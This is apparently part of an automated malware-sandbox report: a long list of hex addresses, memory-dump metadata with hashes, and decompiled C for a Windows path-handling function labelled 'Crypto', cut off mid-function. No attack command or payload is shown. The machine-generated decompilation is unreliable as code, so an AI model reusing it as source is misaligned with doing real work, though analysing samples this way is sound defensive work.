                                        0x1e3afe6e
                                        0x1e3afe72
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3afe80
                                        0x1e3afe80
                                        0x1e3afe83
                                        0x00000000
                                        0x1e3afe83
                                        0x1e405d7f
                                        0x1e405d81
                                        0x00000000
                                        0x00000000
                                        0x1e405d87
                                        0x00000000
                                        0x1e405d87
                                        0x1e3afa4e
                                        0x1e3afa50
                                        0x1e405d90
                                        0x00000000
                                        0x00000000
                                        0x1e405d98
                                        0x1e3afa58
                                        0x1e3afa58
                                        0x1e3afa5d
                                        0x1e3afa60
                                        0x1e3afa63
                                        0x1e3afa69
                                        0x1e3afa6b
                                        0x1e3afa6e
                                        0x1e3afa71
                                        0x1e405da1
                                        0x1e405da7
                                        0x1e405da7
                                        0x1e405da1
                                        0x1e3afa79
                                        0x1e3b0071
                                        0x1e3b0073
                                        0x1e3b0074
                                        0x00000000
                                        0x1e3afa7f
                                        0x1e3afa83
                                        0x1e3afa85
                                        0x1e405dae
                                        0x1e405dae
                                        0x1e3afa8b
                                        0x1e3afa8f
                                        0x1e3afa98
                                        0x1e3afaa1
                                        0x1e3afaa4
                                        0x1e3afaa6
                                        0x1e3afaa9
                                        0x1e3afaac
                                        0x1e405db7
                                        0x1e405dbd
                                        0x1e405dbd
                                        0x1e405db7
                                        0x1e3afab4
                                        0x00000000
                                        0x1e3afaba
                                        0x1e3afabc
                                        0x1e3afac2
                                        0x1e3afac5
                                        0x1e3afac7
                                        0x1e3afac7
                                        0x1e3afad6
                                        0x1e3afad9
                                        0x1e3afadf
                                        0x1e3afae2
                                        0x1e3afae4
                                        0x1e3afae7
                                        0x1e3afaea
                                        0x1e3afaed
                                        0x1e405dc4
                                        0x1e405dc9
                                        0x00000000
                                        0x00000000
                                        0x1e405dcf
                                        0x1e3afaf6
                                        0x1e3afafa
                                        0x1e3afafc
                                        0x1e3afafc
                                        0x1e3afafe
                                        0x1e3afb01
                                        0x1e3afb09
                                        0x1e3afb0c
                                        0x1e3afb12
                                        0x1e3afb14
                                        0x1e3afb17
                                        0x1e405dd6
                                        0x1e405dd9
                                        0x1e405dde
                                        0x00000000
                                        0x00000000
                                        0x1e405de4
                                        0x1e405de7
                                        0x1e3afb29
                                        0x1e3afb2c
                                        0x1e405df3
                                        0x1e405df6
                                        0x1e405e06
                                        0x1e405e0c
                                        0x1e405e0f
                                        0x1e405e11
                                        0x00000000
                                        0x1e405e1f
                                        0x00000000
                                        0x1e405e1f
                                        0x1e405e11
                                        0x1e405df8
                                        0x1e405dfb
                                        0x1e405e00
                                        0x00000000
                                        0x00000000
                                        0x1e405e02
                                        0x00000000
                                        0x1e405e02
                                        0x1e3afb32
                                        0x1e3afb35
                                        0x1e3afb3c
                                        0x1e405e26
                                        0x1e405e28
                                        0x1e405e28
                                        0x1e405e2e
                                        0x1e405e3c
                                        0x1e405e3c
                                        0x1e405e2e
                                        0x1e3afb45
                                        0x1e3afb47
                                        0x1e3afb53
                                        0x1e3afb56
                                        0x1e3afb59
                                        0x1e3afb5c
                                        0x1e3afb65
                                        0x1e3b000d
                                        0x00000000
                                        0x1e3b000f
                                        0x1e3b000f
                                        0x00000000
                                        0x1e3b000f
                                        0x1e3afb6b
                                        0x1e3afb6e
                                        0x1e3afb71
                                        0x1e3afb73
                                        0x1e3afb76
                                        0x1e405e45
                                        0x1e405e4b
                                        0x1e405e4b
                                        0x1e405e45
                                        0x1e3afb80
                                        0x1e3afb83
                                        0x1e405e54
                                        0x1e405e5a
                                        0x1e405e5a
                                        0x1e405e54
                                        0x1e3afb89
                                        0x1e3afb98
                                        0x1e3afb9b
                                        0x1e3afb9e
                                        0x1e3afba0
                                        0x1e405e63
                                        0x1e405e69
                                        0x1e405e69
                                        0x1e405e63
                                        0x1e3afba8
                                        0x00000000
                                        0x1e3afbae
                                        0x1e3afbb2
                                        0x1e405e70
                                        0x1e3afbb8
                                        0x1e3afbb8
                                        0x1e3afbb8
                                        0x1e3afbbd
                                        0x1e3afbbf
                                        0x1e3afbbf
                                        0x1e3af9a8
                                        0x1e3af9a8
                                        0x1e3af9ad
                                        0x1e3af9b4
                                        0x1e405eda
                                        0x00000000
                                        0x00000000
                                        0x1e405ee2
                                        0x1e3af9bc
                                        0x1e3af9bc
                                        0x1e3af9bf
                                        0x1e3af9c4
                                        0x1e3afde6
                                        0x1e3afde9
                                        0x1e3afdec
                                        0x1e3afdef
                                        0x1e3afdf2
                                        0x1e405eeb
                                        0x1e405ef1
                                        0x1e405ef1
                                        0x1e405eeb
                                        0x1e3afdfa
                                        0x00000000
                                        0x1e3afe00
                                        0x1e3afe04
                                        0x1e405efa
                                        0x1e405f00
                                        0x1e405f00
                                        0x1e405efa
                                        0x1e3afe0a
                                        0x1e3afa24
                                        0x1e3afa2a
                                        0x1e3afa2a
                                        0x1e3afdfa
                                        0x1e3af9cd
                                        0x00000000
                                        0x1e3af9cf
                                        0x1e3af9cf
                                        0x1e3af9d1
                                        0x1e3af9d4
                                        0x1e3af9d7
                                        0x1e3af9d9
                                        0x1e3af9dc
                                        0x1e3af9df
                                        0x1e3af9e2
                                        0x1e3af9e7
                                        0x1e405f09
                                        0x00000000
                                        0x00000000
                                        0x1e405f11
                                        0x1e3af9ef
                                        0x1e3af9f3
                                        0x1e3afed5
                                        0x1e3afed8
                                        0x1e3afedb
                                        0x1e405f1a
                                        0x1e405f20
                                        0x1e405f20
                                        0x1e405f1a
                                        0x1e3afee3
                                        0x00000000
                                        0x1e3afee9
                                        0x1e3afeeb
                                        0x1e405f29
                                        0x1e405f2f
                                        0x1e405f2f
                                        0x1e405f29
                                        0x1e3afef3
                                        0x00000000
                                        0x1e3afef9
                                        0x1e3afefc
                                        0x1e3aff01
                                        0x1e405f38
                                        0x1e3b0052
                                        0x1e3b0054
                                        0x00000000
                                        0x1e3b0056
                                        0x1e3b0056
                                        0x1e3aff40
                                        0x1e3aff42
                                        0x1e405f6e
                                        0x1e405f74
                                        0x1e405f74
                                        0x1e405f6e
                                        0x1e3aff50
                                        0x1e3aff56
                                        0x1e3aff5b
                                        0x1e405f7d
                                        0x00000000
                                        0x00000000
                                        0x1e405f83
                                        0x00000000
                                        0x1e3aff61
                                        0x1e3aff61
                                        0x1e3aff63
                                        0x1e3b0021
                                        0x1e3b0026
                                        0x1e3b002b
                                        0x1e3b007e
                                        0x1e3b0080
                                        0x1e3b0080
                                        0x1e3b007e
                                        0x1e3b002f
                                        0x00000000
                                        0x1e3b0031
                                        0x1e3b0033
                                        0x1e3b0086
                                        0x1e3b0035
                                        0x1e3b0035
                                        0x1e3b0035
                                        0x1e3b003c
                                        0x00000000
                                        0x1e3b003c
                                        0x1e3b002f
                                        0x1e3aff69
                                        0x1e3aff6b
                                        0x1e405f8c
                                        0x1e405f92
                                        0x1e405f92
                                        0x1e405f8c
                                        0x1e3aff74
                                        0x1e3aff77
                                        0x1e3aff7b
                                        0x1e405f99
                                        0x1e405f9b
                                        0x1e3aff81
                                        0x1e3aff81
                                        0x1e3aff83
                                        0x1e3aff83
                                        0x1e3aff88
                                        0x1e3aff8b
                                        0x1e3aff90
                                        0x1e3aff92
                                        0x1e3aff92
                                        0x1e3aff9c
                                        0x1e3affa2
                                        0x1e3affa6
                                        0x1e3affaa
                                        0x1e3affad
                                        0x1e3affb2
                                        0x1e405fa4
                                        0x1e405faa
                                        0x1e405faa
                                        0x1e405fa4
                                        0x1e3affb8
                                        0x00000000
                                        0x1e3affb8
                                        0x1e3aff5b
                                        0x1e3b0054
                                        0x1e405f3e
                                        0x1e405f3e
                                        0x1e3aff09
                                        0x00000000
                                        0x00000000
                                        0x1e3aff0f
                                        0x1e3aff14
                                        0x1e405f47
                                        0x1e405f4d
                                        0x1e405f4d
                                        0x1e405f47
                                        0x1e3aff1c
                                        0x1e3b0046
                                        0x1e3b0076
                                        0x1e3b0078
                                        0x00000000
                                        0x1e3b0048
                                        0x1e3b0048
                                        0x1e3b004a
                                        0x1e3b004a
                                        0x00000000
                                        0x1e3b004a
                                        0x1e3aff22
                                        0x1e3aff22
                                        0x1e3aff26
                                        0x1e405f56
                                        0x1e405f5c
                                        0x1e405f5c
                                        0x1e405f56
                                        0x1e3aff2e
                                        0x00000000
                                        0x1e3aff34
                                        0x1e3aff36
                                        0x1e405f65
                                        0x1e3aff3c
                                        0x1e3aff3c
                                        0x1e3aff3c
                                        0x1e3aff3e
                                        0x00000000
                                        0x1e3aff3e
                                        0x1e3aff2e
                                        0x1e3aff1c
                                        0x1e3afef3
                                        0x1e3afee3
                                        0x1e3af9f9
                                        0x1e3af9f9
                                        0x1e3af9fb
                                        0x1e3af9ff
                                        0x1e3afbd5
                                        0x1e405fb1
                                        0x1e405fb1
                                        0x1e3afbdf
                                        0x00000000
                                        0x1e3afbe5
                                        0x1e3afbe5
                                        0x1e3afbe8
                                        0x1e3afbed
                                        0x1e405fdf
                                        0x1e3afc01
                                        0x1e3afc01
                                        0x1e3afc04
                                        0x1e3afc09
                                        0x1e405fee
                                        0x1e405ff4
                                        0x1e405ff4
                                        0x1e405fee
                                        0x1e3afc0f
                                        0x1e3afc13
                                        0x1e3afc1d
                                        0x1e3afc20
                                        0x1e3afc23
                                        0x1e3afc26
                                        0x1e3afc2b
                                        0x1e405ffd
                                        0x1e406003
                                        0x1e406003
                                        0x1e405ffd
                                        0x1e3afc33
                                        0x00000000
                                        0x1e3afc39
                                        0x1e3afc3b
                                        0x1e3afc3e
                                        0x1e3afc41
                                        0x1e3afc46
                                        0x1e40600c
                                        0x1e406012
                                        0x1e406012
                                        0x1e40600c
                                        0x1e3afc4e
                                        0x00000000
                                        0x1e3afc54
                                        0x1e3afc54
                                        0x1e3afc59
                                        0x1e40601b
                                        0x1e406021
                                        0x1e406021
                                        0x1e40601b
                                        0x1e3afc61
                                        0x00000000
                                        0x1e3afc67
                                        0x1e3afc6a
                                        0x1e3afc6f
                                        0x1e40602a
                                        0x1e406030
                                        0x1e406030
                                        0x1e40602a
                                        0x1e3afc77
                                        0x00000000
                                        0x1e3afc7d
                                        0x1e3afc7f
                                        0x1e3afc81
                                        0x1e3afc85
                                        0x1e3afc87
                                        0x1e3afc87
                                        0x1e3afc8c
                                        0x1e3afc8f
                                        0x1e3afc94
                                        0x1e406039
                                        0x1e3afc9c
                                        0x1e3afca4
                                        0x1e3afcaa
                                        0x1e3afcaf
                                        0x1e406046
                                        0x1e3afcbd
                                        0x1e3afcbf
                                        0x1e40606d
                                        0x1e406073
                                        0x1e406073
                                        0x1e40606d
                                        0x1e3afcc8
                                        0x1e3afccd
                                        0x1e3afccf
                                        0x1e3afcd3
                                        0x1e3afcd5
                                        0x1e3afcd5
                                        0x1e3afcde
                                        0x1e3afce1
                                        0x1e3afce3
                                        0x1e3afce3
                                        0x1e3afce8
                                        0x1e3afcf0
                                        0x1e3afcf2
                                        0x1e3afcf5
                                        0x1e3afcf7
                                        0x1e3afcff
                                        0x1e3afd02
                                        0x1e3afd06
                                        0x1e3afd11
                                        0x1e3afd14
                                        0x1e3afd17
                                        0x1e40607c
                                        0x1e406082
                                        0x1e406082
                                        0x1e40607c
                                        0x1e3afd1f
                                        0x00000000
                                        0x1e3afd25
                                        0x1e3afd28
                                        0x1e3afd2d
                                        0x1e40608b
                                        0x1e406091
                                        0x1e406091
                                        0x1e40608b
                                        0x1e3afd35
                                        0x00000000
                                        0x1e3afd3b
                                        0x1e3afd3e
                                        0x1e3afd43
                                        0x1e40609a
                                        0x1e3b0016
                                        0x1e3b0018
                                        0x00000000
                                        0x1e3b001a
                                        0x1e3b001a
                                        0x1e3afd82
                                        0x1e3afd84
                                        0x1e4060d9
                                        0x1e4060df
                                        0x1e4060df
                                        0x1e4060d9
                                        0x1e3afd8d
                                        0x1e3afd95
                                        0x1e3afd98
                                        0x1e3afd9d
                                        0x1e4060e8
                                        0x00000000
                                        0x00000000
                                        0x1e4060ee
                                        0x00000000
                                        0x1e3afda3
                                        0x1e3afda3
                                        0x1e3afda5
                                        0x1e3afe8b
                                        0x1e3afe90
                                        0x1e3afe95
                                        0x1e4060f7
                                        0x1e4060fd
                                        0x1e4060fd
                                        0x1e4060f7
                                        0x1e3afe9d
                                        0x00000000
                                        0x1e3afea3
                                        0x1e3afea5
                                        0x1e406106
                                        0x1e3afeab
                                        0x1e3afeab
                                        0x1e3afeab
                                        0x1e3afeb2
                                        0x1e3afeb5
                                        0x00000000
                                        0x1e3afeb5
                                        0x1e3afe9d
                                        0x1e3afdab
                                        0x1e3afdad
                                        0x1e40610f
                                        0x1e406115
                                        0x1e406115
                                        0x1e40610f
                                        0x1e3afdb6
                                        0x1e3afdbb
                                        0x1e40611e
                                        0x1e406120
                                        0x1e3afdc1
                                        0x1e3afdc1
                                        0x1e3afdc5
                                        0x1e3afdc5
                                        0x1e3afdc7
                                        0x1e3afdcc
                                        0x1e3afdce
                                        0x1e3afdce
                                        0x1e3afdd6
                                        0x1e3afdd8
                                        0x00000000
                                        0x1e3afdd8
                                        0x1e3afd9d
                                        0x1e3b0018
                                        0x1e4060a0
                                        0x1e4060a0
                                        0x1e3afd4b
                                        0x00000000
                                        0x00000000
                                        0x1e3afd51
                                        0x1e3afd56
                                        0x1e4060a9
                                        0x1e4060af
                                        0x1e4060af
                                        0x1e4060a9
                                        0x1e3afd5e
                                        0x1e3afebf
                                        0x1e4060b8
                                        0x1e3afec5
                                        0x1e3afec5
                                        0x1e3afec5
                                        0x1e3afec7
                                        0x00000000
                                        0x1e3afd64
                                        0x1e3afd64
                                        0x1e3afd68
                                        0x1e4060c1
                                        0x1e4060c7
                                        0x1e4060c7
                                        0x1e4060c1
                                        0x1e3afd70
                                        0x00000000
                                        0x1e3afd76
                                        0x1e3afd78
                                        0x1e4060d0
                                        0x1e3afd7e
                                        0x1e3afd7e
                                        0x1e3afd7e
                                        0x1e3afd80
                                        0x00000000
                                        0x1e3afd80
                                        0x1e3afd70
                                        0x1e3afd5e
                                        0x1e3afd35
                                        0x1e3afd1f
                                        0x1e40604c
                                        0x1e40604c
                                        0x1e3afcb7
                                        0x1e3affc0
                                        0x1e3affc3
                                        0x1e3affc6
                                        0x1e3affcb
                                        0x1e406055
                                        0x1e40605b
                                        0x1e40605b
                                        0x1e406055
                                        0x1e3affd3
                                        0x00000000
                                        0x1e3affd9
                                        0x1e3affdb
                                        0x1e406064
                                        0x1e3affe1
                                        0x1e3affe1
                                        0x1e3affe1
                                        0x1e3affe3
                                        0x1e3affe7
                                        0x1e3affed
                                        0x00000000
                                        0x1e3affed
                                        0x1e3affd3
                                        0x00000000
                                        0x1e3afcb7
                                        0x1e40603f
                                        0x1e3afc9a
                                        0x00000000
                                        0x1e3afc9a
                                        0x1e3afc77
                                        0x1e3afc61
                                        0x1e3afc4e
                                        0x1e3afc33
                                        0x1e405fe5
                                        0x1e405fe5
                                        0x1e3afbf5
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3afbf5
                                        0x1e3afbdf
                                        0x1e3afa05
                                        0x1e3afa05
                                        0x1e3afa0a
                                        0x1e3afe14
                                        0x1e405fb8
                                        0x1e405fb8
                                        0x1e3afe1e
                                        0x00000000
                                        0x1e3afe24
                                        0x00000000
                                        0x1e3afe24
                                        0x1e3afe1e
                                        0x1e3afa10
                                        0x1e3afa10
                                        0x1e3afa15
                                        0x1e3afe29
                                        0x1e3afe2d
                                        0x1e3afe35
                                        0x1e3afe38
                                        0x1e3afe3b
                                        0x1e405fc1
                                        0x00000000
                                        0x00000000
                                        0x1e405fc7
                                        0x1e3afe43
                                        0x1e3afe45
                                        0x00000000
                                        0x00000000
                                        0x1e3afe4b
                                        0x1e3afe50
                                        0x1e405fd0
                                        0x1e405fd6
                                        0x1e405fd6
                                        0x1e405fd0
                                        0x1e3afe5d
                                        0x1e3afe60
                                        0x00000000
                                        0x1e3afe60
                                        0x1e3afe41
                                        0x1e3afe41
                                        0x00000000
                                        0x1e3afa1b
                                        0x1e3afa1b
                                        0x1e3afa1d
                                        0x1e3afa20
                                        0x00000000
                                        0x1e3afa20
                                        0x1e3afa15
                                        0x1e3af9ed
                                        0x1e3af9ed
                                        0x00000000
                                        0x1e3af9ed
                                        0x1e3af9cd
                                        0x1e3af9ba
                                        0x1e3af9ba
                                        0x00000000
                                        0x1e3af9ba
                                        0x1e3afba8
                                        0x1e3afb65
                                        0x1e3afb1d
                                        0x1e3afb23
                                        0x1e3afb26
                                        0x00000000
                                        0x1e3afb26
                                        0x1e3afaf3
                                        0x1e3afaf3
                                        0x00000000
                                        0x1e3afaf3
                                        0x1e3afab4
                                        0x1e3afa79
                                        0x1e3afa56
                                        0x1e3afa56
                                        0x00000000
                                        0x1e3afa56
                                        0x1e3af94d
                                        0x1e3af950
                                        0x1e3af955
                                        0x1e405e79
                                        0x1e405e7f
                                        0x1e405e7f
                                        0x1e405e79
                                        0x1e3af95b
                                        0x1e3af960
                                        0x1e405e88
                                        0x1e405e8a
                                        0x1e405e8a
                                        0x1e405e8e
                                        0x1e405e93
                                        0x00000000
                                        0x1e405e99
                                        0x1e405e9c
                                        0x1e405e9f
                                        0x1e405ea1
                                        0x1e405ea3
                                        0x1e405ea3
                                        0x1e405ea7
                                        0x00000000
                                        0x1e405ea7
                                        0x1e3af966
                                        0x1e3af966
                                        0x1e3af96b
                                        0x1e405eb0
                                        0x1e405eb6
                                        0x1e405eb6
                                        0x1e405eb0
                                        0x1e3af973
                                        0x1e3afbc7
                                        0x1e3af9a5
                                        0x1e3af9a5
                                        0x00000000
                                        0x1e3af979
                                        0x1e3af97d
                                        0x1e3af97f
                                        0x1e405ebf
                                        0x1e405ec5
                                        0x1e405ec5
                                        0x1e405ebf
                                        0x1e3af987
                                        0x00000000
                                        0x1e3af98d
                                        0x1e3af98d
                                        0x1e3af990
                                        0x1e3af994
                                        0x1e3af997
                                        0x1e3af99f
                                        0x1e3afff7
                                        0x1e3b0061
                                        0x1e3b0064
                                        0x1e3b006a
                                        0x1e405ece
                                        0x1e405ed0
                                        0x1e405ed0
                                        0x00000000
                                        0x1e3b0064
                                        0x1e3afffd
                                        0x1e3b0000
                                        0x00000000
                                        0x1e3b0006
                                        0x1e405ecc
                                        0x00000000
                                        0x1e405ecc
                                        0x1e3b0000
                                        0x00000000
                                        0x1e3af99f
                                        0x1e3af987
                                        0x1e3af973

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                        • Instruction ID: 8b77b0b3f4dffe1095aa4dcea0b2e9cf76e7309d44d1d1d9d5345bbc224d576f
                                        • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                        • Instruction Fuzzy Hash: 3F62B331E146929BCB22CE25C45029AFBA7EF85354F2983A9CD94DB389D375D9C1CBC0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3C6E30, Relevance: .5, Instructions: 481COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 95%
                                        			E1E3C6E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x1e47fca8);
				_push(0x1e3f17f0);
				_push( *[fs:0x0]);
				_t312 =  *0x1e49d360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E1E3EFA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E1E3C74C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E1E3D9BC6( &_v52, 0x1e381080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E1E3E9377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E1E4246A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M1E3C749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E1E3A52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L1E3B2600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L1E3B2600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L1E424735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E1E3EBB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E1E3D2010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L1E424658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E1E3D9BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E1E3A52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L1E3A83AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E1E3A52A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L1E3A83AE(_t428);
